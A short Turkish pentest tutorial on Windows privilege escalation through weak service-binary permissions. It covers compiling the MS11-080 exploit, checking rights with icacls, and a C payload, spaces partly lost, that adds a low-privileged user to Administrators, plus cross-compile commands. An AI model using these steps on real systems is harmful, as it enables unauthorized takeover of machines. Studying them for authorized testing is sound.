Zayıf Servislerden Kaynaklı Hak ve Yetki Yükseltme Saldırıları
Windows
Seneryo 1
ms11-080 exploiti indiridikten sonra .exe formatına dönüştürmek için aşağıdaki kod kullanılmalıdır. Elde edilen exe dosyası hedef makinede çalıştırıldıktan sonra SYSTEM haklarına ulaşmış olur.
# python pyinstaller.py --onefile ms11-080.py
Simple Command
win> move source dest
win> copy source dest
3. parti uygulamaların kurulduklarında beraberinde servisleri de sisteme yüklenir. Yüklenilen 3. parti bir uygulamanın servisine "services.msc" üzerinden ulaşılabilir. Çalışan servisin ".exe" dosyası bulunduktan sonra bu dosyayı çalıştırmaya hak ve yetkisi olan kullanıcıları listelemek için aşağıdaki komut kullanılmalıdır.
win> icacls.exe <exe_name.exe>
Yukarıdaki komut sonucunda ilgili exe üzerinde hak ve yetkileri olan kullanıcılar listenir. Bu kullanıcılar arasında oturum elde edilmiş düşük hak ve yetkideki kullanıcı olmasına dikkat edilir. Ayrıca "Everyone" kullanıcı var ise buna ait yetkilere de bakılmalıdır. Elde edilen çıktıda parantez içerisinde yer alan bazı kısaltmaların açıklamaları aşağıdadır.
F : Full Access
D : Delete
R : Read
W : Write
#include <stdlib.h>intmain(){int i; i =system ("net localgroup Administrators lowpriv /add");return0;}
yukarıda yer alan komutu linuxda windows platformuna uygun derlemek için # i586-mingw32msvc-gcc exploit.c -o exploit.exe veya # i686-w64-mingw32-gcc exploit.c -o exploit.exe olarak derlenir.
Eğer hata alınırsa;
i686-w64-mingw32-gcc afd.sys.c -o afdsys.exe -m32 -lws2_32 komutuyla derleme işlemi yapılabilir.